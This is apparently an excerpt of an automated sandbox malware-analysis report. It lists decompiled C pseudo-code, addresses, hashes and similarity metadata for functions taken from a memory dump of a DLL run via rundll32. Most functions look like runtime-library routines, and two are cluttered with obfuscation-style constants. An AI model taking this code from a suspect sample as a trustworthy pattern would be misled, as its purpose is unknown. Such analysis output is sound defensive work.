                                0x7ffc130f4fb7
                                0x7ffc130f4fc2
                                0x7ffc130f4fe1

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide$AllocHeap_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 2395940807-0
                                • Opcode ID: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                                • Instruction ID: bead81b311d4956a53ee90830fa4c9ec142b17a700b8c3690d425cc51ce643dc
                                • Opcode Fuzzy Hash: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                                • Instruction Fuzzy Hash: 5121B531B08F6A42FA149F66AD0013AA2D9AFC4BB8F150934ED5D637D5EE3CD464C220
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F6400 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E00007FFC7FFC130F6400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t52;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x130f6431;
				if (__edx >= 0) goto 0x130f6431;
				E00007FFC7FFC130F6BDC(_t27, _t52);
				_t28 = _t27 & 0xfffffff7;
				goto 0x130f6488;
				_t43 = 0x00000004 & dil;
				if (_t43 == 0) goto 0x130f644c;
				asm("dec eax");
				if (_t43 >= 0) goto 0x130f644c;
				E00007FFC7FFC130F6BDC(_t28, _t52);
				_t29 = _t28 & 0xfffffffb;
				goto 0x130f6488;
				_t44 = dil & 0x00000001;
				if (_t44 == 0) goto 0x130f6468;
				asm("dec eax");
				if (_t44 >= 0) goto 0x130f6468;
				E00007FFC7FFC130F6BDC(_t29, _t52);
				_t30 = _t29 & 0xfffffffe;
				goto 0x130f6488;
				_t45 = dil & 0x00000002;
				if (_t45 == 0) goto 0x130f6488;
				asm("dec eax");
				if (_t45 >= 0) goto 0x130f6488;
				if ((dil & 0x00000010) == 0) goto 0x130f6485;
				E00007FFC7FFC130F6BDC(_t30, _t52);
				_t31 = _t30 & 0xfffffffd;
				_t47 = dil & 0x00000010;
				if (_t47 == 0) goto 0x130f64a2;
				asm("dec eax");
				if (_t47 >= 0) goto 0x130f64a2;
				E00007FFC7FFC130F6BDC(_t31, _t52);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                0x7ffc130f6400
                                0x7ffc130f6405
                                0x7ffc130f6414
                                0x7ffc130f641c
                                0x7ffc130f6420
                                0x7ffc130f6427
                                0x7ffc130f642c
                                0x7ffc130f642f
                                0x7ffc130f6436
                                0x7ffc130f6439
                                0x7ffc130f643b
                                0x7ffc130f6440
                                0x7ffc130f6442
                                0x7ffc130f6447
                                0x7ffc130f644a
                                0x7ffc130f644c
                                0x7ffc130f6450
                                0x7ffc130f6452
                                0x7ffc130f6457
                                0x7ffc130f645e
                                0x7ffc130f6463
                                0x7ffc130f6466
                                0x7ffc130f6468
                                0x7ffc130f646c
                                0x7ffc130f646e
                                0x7ffc130f6473
                                0x7ffc130f6479
                                0x7ffc130f6480
                                0x7ffc130f6485
                                0x7ffc130f6488
                                0x7ffc130f648c
                                0x7ffc130f648e
                                0x7ffc130f6493
                                0x7ffc130f649a
                                0x7ffc130f64b8

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _set_statfp
                                • String ID:
                                • API String ID: 1156100317-0
                                • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction ID: 964fa575040371325d65a34880e014d11f59a0afc52581298c705295d34a18fa
                                • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction Fuzzy Hash: 8F11C426E18E3F0BF6542134DF4637911D96F453BCE080AB4E96E27AD6CE2D7461D231
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FA4A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128memoryfileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00007FFC7FFC130FA4A0(long long __rax, signed int __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, intOrPtr _a104, intOrPtr _a120) {
				long long _v96;
				short _v104;
				void* __rbx;
				long long _t55;
				intOrPtr _t60;
				signed long long _t62;
				void* _t68;
				void* _t69;

				_t55 = __rax;
				r8d = r8d + 4;
				_a104 = _a104 + 0xfffffdb4;
				r9d = __rcx - 0x30d5;
				_a96 = r8d;
				_a16 = r9d;
				_a120 = _a80 + 0xffffda68;
				if (_a120 + 0x18b7 - __r9 + 0x38e9 > 0) goto 0x130fa608;
				if (__rdx - 0xea2 - _a96 + 0xffffee57 <= 0) goto 0x130fa5fa;
				_t60 = _a88;
				_v96 = 0x38e9;
				r9d = 0x3666;
				_v104 = 0x2598;
				r8d = 0x37e1;
				E00007FFC7FFC130E9AC0(_t60, __rcx, _t60, _t69);
				 *((long long*)(_t60 + 0x348)) = _t55;
				_t62 = __rcx ^ 0x0000a532;
				 *(_t60 + 0x158) = _t62;
				if ( *( *((intOrPtr*)(_t60 + 0x1a0)) + 0xb0) * 0x4b917808 == 0x2598) goto 0x130fa5bc;
				 *(_t60 + 0x1b0) =  *(_t60 + 0x1b0) |  *( *((intOrPtr*)(_t60 + 0x1c0)) + 0x120) ^ 0x00002032;
				if (0x2599 != _t62) goto 0x130fa590;
				_v96 = 0x3189;
				r9d = 0x3666;
				_v104 = 0x30d5;
				r8d = 0x37e1;
				E00007FFC7FFC130E9AC0(_t60, _t62, _t60, _t69);
				 *((long long*)(_t60 + 0x350)) = 0x2599;
				 *((long long*)(_t60 + 0x120)) =  *((long long*)(_t60 + 0x120)) + 0xfffff73c;
				return _t68 + 0x2103;
			}











                                0x7ffc130fa4a0
                                0x7ffc130fa4af
                                0x7ffc130fa4c7
                                0x7ffc130fa4d8
                                0x7ffc130fa4df
                                0x7ffc130fa4ee
                                0x7ffc130fa4f6
                                0x7ffc130fa4ff
                                0x7ffc130fa513
                                0x7ffc130fa519
                                0x7ffc130fa529
                                0x7ffc130fa532
                                0x7ffc130fa538
                                0x7ffc130fa53d
                                0x7ffc130fa548
                                0x7ffc130fa54d
                                0x7ffc130fa55d
                                0x7ffc130fa564
                                0x7ffc130fa57f
                                0x7ffc130fa5a5
                                0x7ffc130fa5ba
                                0x7ffc130fa5c1
                                0x7ffc130fa5ca
                                0x7ffc130fa5d0
                                0x7ffc130fa5d5
                                0x7ffc130fa5e3
                                0x7ffc130fa5e8
                                0x7ffc130fa5ef
                                0x7ffc130fa607

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: CreateCriticalFileHeapLeaveLockSection
                                • String ID: 8
                                • API String ID: 4149557297-406019892
                                • Opcode ID: 7dc74a2b659ee5eff0f1ee3774e6a1c62d1fe173903ebc6207a3731a296c528a
                                • Instruction ID: 5fe38b4b8d1eaab9386d1c2296811315ce8ec8f632313b3aa5417c44abe94267
                                • Opcode Fuzzy Hash: 7dc74a2b659ee5eff0f1ee3774e6a1c62d1fe173903ebc6207a3731a296c528a
                                • Instruction Fuzzy Hash: 19616D736086D48BD362CF15E544BDEB7A8FB88794F154139EB8957798CB38D990CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4898 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 16%
                                			E00007FFC7FFC130F4898(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				int _t33;
				long _t37;
				void* _t38;
				signed int _t39;
				int _t48;
				signed long long _t60;
				short* _t65;
				signed int* _t66;
				void* _t82;
				void* _t89;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t102;

				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFC7FFC130F7050(_t38, __rax, __rcx, _t82, __r8, _t95, _t98);
				_t60 =  *0x13123760; // 0xb74f7d657c87
				_a5176 = _t60 ^ _t89 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t102 = _t101 + __r8;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] =  *((intOrPtr*)(0x13124970 + (__edx >> 6) * 8));
				if (__r8 - _t102 >= 0) goto 0x130f49db;
				_t65 =  &_a40;
				if (__r8 - _t102 >= 0) goto 0x130f4943;
				_t39 =  *__r8 & 0x0000ffff;
				if (_t39 != 0xa) goto 0x130f492f;
				 *_t65 = 0xd;
				_t66 = _t65 + 2;
				 *_t66 = _t39;
				if ( &(_t66[0]) -  &_a1744 < 0) goto 0x130f4911;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				_t48 = _t33;
				if (_t33 == 0) goto 0x130f49d3;
				if (_t33 == 0) goto 0x130f49c3;
				_v8 = _v8 & 0x00000000;
				r8d = _t48;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f49d3;
				if (0 + _a24 - _t48 < 0) goto 0x130f4990;
				__rcx[1] = __edi - r15d;
				goto 0x130f4906;
				_t37 = GetLastError();
				 *__rcx = _t37;
				E00007FFC7FFC130F6D80();
				return _t37;
			}



















                                0x7ffc130f4898
                                0x7ffc130f489d
                                0x7ffc130f48af
                                0x7ffc130f48b7
                                0x7ffc130f48c1
                                0x7ffc130f48d2
                                0x7ffc130f48e0
                                0x7ffc130f48e4
                                0x7ffc130f48fc
                                0x7ffc130f48ff
                                0x7ffc130f4906
                                0x7ffc130f490c
                                0x7ffc130f4914
                                0x7ffc130f4916
                                0x7ffc130f4921
                                0x7ffc130f4928
                                0x7ffc130f492b
                                0x7ffc130f492f
                                0x7ffc130f4941
                                0x7ffc130f4943
                                0x7ffc130f494e
                                0x7ffc130f495c
                                0x7ffc130f496f
                                0x7ffc130f4974
                                0x7ffc130f497e
                                0x7ffc130f4984
                                0x7ffc130f4988
                                0x7ffc130f498e
                                0x7ffc130f4990
                                0x7ffc130f49a5
                                0x7ffc130f49ae
                                0x7ffc130f49b9
                                0x7ffc130f49c1
                                0x7ffc130f49c8
                                0x7ffc130f49ce
                                0x7ffc130f49d3
                                0x7ffc130f49d9
                                0x7ffc130f49e9
                                0x7ffc130f4a09

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: U
                                • API String ID: 2456169464-4171548499
                                • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction ID: c6116eb31599becb4ad0f909fe8d585fdfe02209de7472e901fd323701e8414b
                                • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction Fuzzy Hash: E941F622B1CA5982EB20CF25E8043BA77A4FB887A8F414031EE8DA7788DF3CD511C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F20A8 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E00007FFC7FFC130F20A8(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
				void* _t43;
				signed int _t52;
				void* _t53;
				void* _t61;
				signed int _t64;
				signed char _t66;
				signed char _t75;
				signed int _t76;
				void* _t100;
				signed int _t109;

				_t75 = __edx;
				_a8 = __rbx;
				_a24 = __rbp;
				 *__rcx = 0;
				r14d = r9d;
				_t76 = __edx;
				if (__eflags == 0) goto 0x130f211a;
				if (__eflags == 0) goto 0x130f20f9;
				if ((__edx & 0x00000003) - 1 == 1) goto 0x130f20f2;
				_t43 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t43);
				goto 0x130f211f;
				goto 0x130f211f;
				asm("sbb eax, eax");
				goto 0x130f211f;
				__rcx[1] = 0x80000000;
				_t52 = _t76 & 0x00000700;
				if ((_t75 & 0x00000008) == 0) goto 0x130f218b;
				if (_t52 == 0x100) goto 0x130f2184;
				if (_t52 == 0x200) goto 0x130f217d;
				if (_t52 == 0x300) goto 0x130f2176;
				if (_t52 == 0x400) goto 0x130f218b;
				if (_t52 == 0x500) goto 0x130f216f;
				if (_t52 == 0x600) goto 0x130f217d;
				_t100 = _t52 - 0x700;
				if (_t100 == 0) goto 0x130f216f;
				_t53 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t53);
				goto 0x130f2190;
				goto 0x130f2190;
				goto 0x130f2190;
				goto 0x130f2190;
				goto 0x130f2190;
				__rcx[2] = 3;
				if (_t100 == 0) goto 0x130f21e2;
				if (_t100 == 0) goto 0x130f21db;
				if (_t100 == 0) goto 0x130f21d4;
				if (_t100 == 0) goto 0x130f21cd;
				if (_t100 == 0) goto 0x130f21be;
				_t61 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t61);
				goto 0x130f21e4;
				sil = __rcx[1] == 0x80000000;
				goto 0x130f21e4;
				goto 0x130f21e4;
				goto 0x130f21e4;
				goto 0x130f21e4;
				__rcx[5] = __rcx[5] & 0x00000000;
				bpl = 0x80;
				__rcx[3] = 0;
				__rcx[4] = 0x80;
				if ((bpl & dil) == 0) goto 0x130f21fd;
				 *__rcx =  *__rcx | 0x00000010;
				if ((0x00008000 & _t76) != 0) goto 0x130f2225;
				if ((_t76 & 0x00074000) != 0) goto 0x130f2222;
				if (E00007FFC7FFC130F4DDC(_t75, __rax,  &_a16) != 0) goto 0x130f229b;
				if (_a16 == 0x8000) goto 0x130f2225;
				 *__rcx =  *__rcx | bpl;
				if ((0x00000100 & _t76) == 0) goto 0x130f2245;
				_t64 =  *0x13124dd4; // 0x0
				_t66 =  !_t64 & r14d;
				if ((bpl & _t66) != 0) goto 0x130f2245;
				__rcx[4] = 1;
				_t109 = dil & 0x00000040;
				if (_t109 == 0) goto 0x130f2259;
				asm("bts dword [ebx+0x14], 0x1a");
				asm("bts dword [ebx+0x4], 0x10");
				__rcx[3] = __rcx[3] | 0x00000004;
				asm("bt edi, 0xc");
				if (_t109 >= 0) goto 0x130f2262;
				__rcx[4] = __rcx[4] | 0x00000100;
				asm("bt edi, 0xd");
				if (_t109 >= 0) goto 0x130f226d;
				asm("bts dword [ebx+0x14], 0x19");
				if ((dil & 0x00000020) == 0) goto 0x130f227a;
				asm("bts dword [ebx+0x14], 0x1b");
				goto 0x130f2285;
				if ((dil & 0x00000010) == 0) goto 0x130f2285;
				asm("bts dword [ebx+0x14], 0x1c");
				return _t66;
			}













                                0x7ffc130f20a8
                                0x7ffc130f20a8
                                0x7ffc130f20ad
                                0x7ffc130f20bd
                                0x7ffc130f20c2
                                0x7ffc130f20c8
                                0x7ffc130f20d2
                                0x7ffc130f20d7
                                0x7ffc130f20dc
                                0x7ffc130f20de
                                0x7ffc130f20e3
                                0x7ffc130f20e9
                                0x7ffc130f20f0
                                0x7ffc130f20f7
                                0x7ffc130f210c
                                0x7ffc130f2118
                                0x7ffc130f211f
                                0x7ffc130f2129
                                0x7ffc130f212b
                                0x7ffc130f2132
                                0x7ffc130f2139
                                0x7ffc130f2140
                                0x7ffc130f2147
                                0x7ffc130f214e
                                0x7ffc130f2155
                                0x7ffc130f2157
                                0x7ffc130f2159
                                0x7ffc130f215b
                                0x7ffc130f2160
                                0x7ffc130f2166
                                0x7ffc130f216d
                                0x7ffc130f2174
                                0x7ffc130f217b
                                0x7ffc130f2182
                                0x7ffc130f2189
                                0x7ffc130f2190
                                0x7ffc130f2196
                                0x7ffc130f219b
                                0x7ffc130f21a0
                                0x7ffc130f21a5
                                0x7ffc130f21aa
                                0x7ffc130f21ac
                                0x7ffc130f21b1
                                0x7ffc130f21b7
                                0x7ffc130f21bc
                                0x7ffc130f21c7
                                0x7ffc130f21cb
                                0x7ffc130f21d2
                                0x7ffc130f21d9
                                0x7ffc130f21e0
                                0x7ffc130f21e4
                                0x7ffc130f21e8
                                0x7ffc130f21eb
                                0x7ffc130f21ee
                                0x7ffc130f21f8
                                0x7ffc130f21fa
                                0x7ffc130f2204
                                0x7ffc130f220c
                                0x7ffc130f221a
                                0x7ffc130f2220
                                0x7ffc130f2222
                                0x7ffc130f222c
                                0x7ffc130f222e
                                0x7ffc130f2236
                                0x7ffc130f223c
                                0x7ffc130f223e
                                0x7ffc130f2245
                                0x7ffc130f2249
                                0x7ffc130f224b
                                0x7ffc130f2250
                                0x7ffc130f2255
                                0x7ffc130f2259
                                0x7ffc130f225d
                                0x7ffc130f225f
                                0x7ffc130f2262
                                0x7ffc130f2266
                                0x7ffc130f2268
                                0x7ffc130f2271
                                0x7ffc130f2273
                                0x7ffc130f2278
                                0x7ffc130f227e
                                0x7ffc130f2280
                                0x7ffc130f229a

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                • String ID:
                                • API String ID: 72036449-0
                                • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction ID: a29df5b4091cd437e0b99f029867bc5ddfa8e1a5fa130d5ab96c2e0768c50546
                                • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction Fuzzy Hash: 6551A12AE0CE2F43F7A9692C8E0137A66DCBB50738F194475DB0D661D6CA2CE860C665
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E2A70 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 159memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E00007FFC7FFC130E2A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
				void* __r13;
				void* __r14;
				void* __r15;
				intOrPtr _t93;
				intOrPtr _t99;
				signed int _t105;
				void* _t110;
				signed long long _t136;
				intOrPtr _t149;
				long long _t150;
				void* _t154;
				void* _t155;
				void* _t158;
				signed long long _t159;
				void* _t160;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t168;
				long long _t170;
				void* _t171;

				r13d =  *(_t160 + 0x100);
				r10d = __r8 - 0x30d5;
				r12d =  *(_t160 + 0x108);
				r8d = __rcx - 0x1408;
				r13d = r13d + 0xffffda68;
				 *(_t160 + 0x100) = r10d;
				_t170 = __rdx;
				 *(_t160 + 0x108) = r8d;
				_t110 = __rcx + 0x61f;
				r9d = r9d + 0xffffeb0d;
				_t99 =  *((intOrPtr*)(_t160 + 0xf0)) + 0xffffd84e;
				 *((intOrPtr*)(_t160 + 0xd0)) = r9d;
				 *((intOrPtr*)(_t160 + 0xe8)) = _t99;
				r12d = r12d + 0xffffdc0a;
				r15d = r13d;
				if (_t99 - _t168 + 0x3189 >= 0) goto 0x130e2d94;
				if (_t99 - __r8 - 0x106 >= 0) goto 0x130e2d94;
				if (_t110 == _t154 - 0x3f3) goto 0x130e2d94;
				 *((long long*)(_t160 + 0xc8)) = __rbx;
				if (r12d - _t168 + 0x1f2c > 0) goto 0x130e2c16;
				_t149 =  *((intOrPtr*)(__rdx + 0x1c0));
				r9d = __r10 + 0x2598;
				_t136 =  *((intOrPtr*)(__rdx + 0x1e0));
				r10d = _t158 - 0x984;
				r11d = _t154 - 0x1956;
				r8d = _t166 + 0x2103;
				_t108 =  *(_t160 + 0x100) + 0x38e9;
				 *(__rdx + 0x68) =  *(_t149 + 0x188) * 0x5adf2c5c;
				 *(__rdx + 0xa0) = _t136 | 0x00002598;
				_t105 = _t168 + 0x27b2;
				 *((intOrPtr*)(_t160 + 0x60)) = _t154 - 0x12ab;
				 *(_t160 + 0x58) = r10d;
				 *((intOrPtr*)(_t160 + 0x50)) = r9d;
				 *((intOrPtr*)(_t160 + 0x48)) = r11d;
				 *((intOrPtr*)(_t160 + 0x40)) = _t155 + 0x4ca;
				 *((long long*)(__rdx + 0x1e0)) = _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59;
				 *(_t160 + 0x38) = _t105;
				 *(_t160 + 0x30) =  *(_t160 + 0x100) + 0x38e9;
				 *((long long*)(_t160 + 0x28)) = __rdx;
				 *((intOrPtr*)(_t160 + 0x20)) = _t110 + 0xffffeb3f;
				E00007FFC7FFC130FD5F0( *((intOrPtr*)(_t160 + 0xe0)) + 0x3f3, _t136 | 0x00002598, _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59, _t149, __r8, _t163, _t165, _t168, __rdx, _t171);
				goto 0x130e2d8c;
				_t150 = r13d;
				_t159 = r12d;
				 *((long long*)(_t160 + 0x70)) = _t150;
				if (_t150 - _t159 *  *(__rdx + 0x198) < 0) goto 0x130e2c95;
				GetProcessHeap();
				if (r13d + 4 - _t159 *  *(__rdx + 0x198) >= 0) goto 0x130e2c43;
				r13d = r15d;
				r8d =  *(_t160 + 0x108);
				r9d =  *((intOrPtr*)(_t160 + 0xd0));
				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x130e2d8c;
				if ( *((intOrPtr*)(_t160 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d > 0) goto 0x130e2d8c;
				_t93 =  *((intOrPtr*)(__rdx + 0x78));
				if (_t93 - (_t154 + _t171 | _t105) > 0) goto 0x130e2d8c;
				asm("o16 nop [eax+eax]");
				 *(_t160 + 0x58) = 0x2743;
				 *((long long*)(_t160 + 0x50)) = 0x2de1;
				 *((long long*)(_t160 + 0x48)) = 0x19c7;
				r9d = 0x1ff4;
				 *((long long*)(_t160 + 0x40)) = 0x2e2f;
				r8d = 0x1c0c;
				 *(_t160 + 0x38) = 0x26f1;
				 *(_t160 + 0x30) = 0x1000;
				 *((long long*)(_t160 + 0x28)) = 0x1acd;
				 *((long long*)(_t160 + 0x20)) = 0x1f1c;
				 *0x13124160 = E00007FFC7FFC130FF8F0(_t93, _t108 & 0x00003189, _t93 - (_t154 + _t171 | _t105), ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d,  *((intOrPtr*)(_t160 + 0x70)), _t108, _t163, _t165);
				r15d = r15d ^ r13d &  *(_t170 + 0x188);
				 *(_t170 + 0xb0) = r8d |  *(_t170 + 0xd8);
				if (_t93 + 3 - (_t154 + _t171 | _t105) <= 0) goto 0x130e2cf0;
				return _t171 + 0x1f2c;
			}
























                                0x7ffc130e2a83
                                0x7ffc130e2a8b
                                0x7ffc130e2aa0
                                0x7ffc130e2aa8
                                0x7ffc130e2aaf
                                0x7ffc130e2ab6
                                0x7ffc130e2abe
                                0x7ffc130e2ac1
                                0x7ffc130e2ad0
                                0x7ffc130e2ad6
                                0x7ffc130e2add
                                0x7ffc130e2aea
                                0x7ffc130e2af8
                                0x7ffc130e2aff
                                0x7ffc130e2b06
                                0x7ffc130e2b0b
                                0x7ffc130e2b1a
                                0x7ffc130e2b28
                                0x7ffc130e2b35
                                0x7ffc130e2b40
                                0x7ffc130e2b46
                                0x7ffc130e2b4d
                                0x7ffc130e2b54
                                0x7ffc130e2b5b
                                0x7ffc130e2b62
                                0x7ffc130e2b86
                                0x7ffc130e2b8e
                                0x7ffc130e2b94
                                0x7ffc130e2ba1
                                0x7ffc130e2bb5
                                0x7ffc130e2bca
                                0x7ffc130e2bd4
                                0x7ffc130e2bd9
                                0x7ffc130e2bde
                                0x7ffc130e2be3
                                0x7ffc130e2be7
                                0x7ffc130e2bf5
                                0x7ffc130e2bff
                                0x7ffc130e2c03
                                0x7ffc130e2c08
                                0x7ffc130e2c0c
                                0x7ffc130e2c11
                                0x7ffc130e2c16
                                0x7ffc130e2c1c
                                0x7ffc130e2c22
                                0x7ffc130e2c32
                                0x7ffc130e2c61
                                0x7ffc130e2c7b
                                0x7ffc130e2c82
                                0x7ffc130e2c85
                                0x7ffc130e2c8d
                                0x7ffc130e2cae
                                0x7ffc130e2ccb
                                0x7ffc130e2cd1
                                0x7ffc130e2cdd
                                0x7ffc130e2ce6
                                0x7ffc130e2cf0
                                0x7ffc130e2cfe
                                0x7ffc130e2d0c
                                0x7ffc130e2d15
                                0x7ffc130e2d1b
                                0x7ffc130e2d24
                                0x7ffc130e2d2a
                                0x7ffc130e2d33
                                0x7ffc130e2d3c
                                0x7ffc130e2d45
                                0x7ffc130e2d59
                                0x7ffc130e2d6a
                                0x7ffc130e2d77
                                0x7ffc130e2d86
                                0x7ffc130e2dad

                                APIs
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC130E906E), ref: 00007FFC130E2C61
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
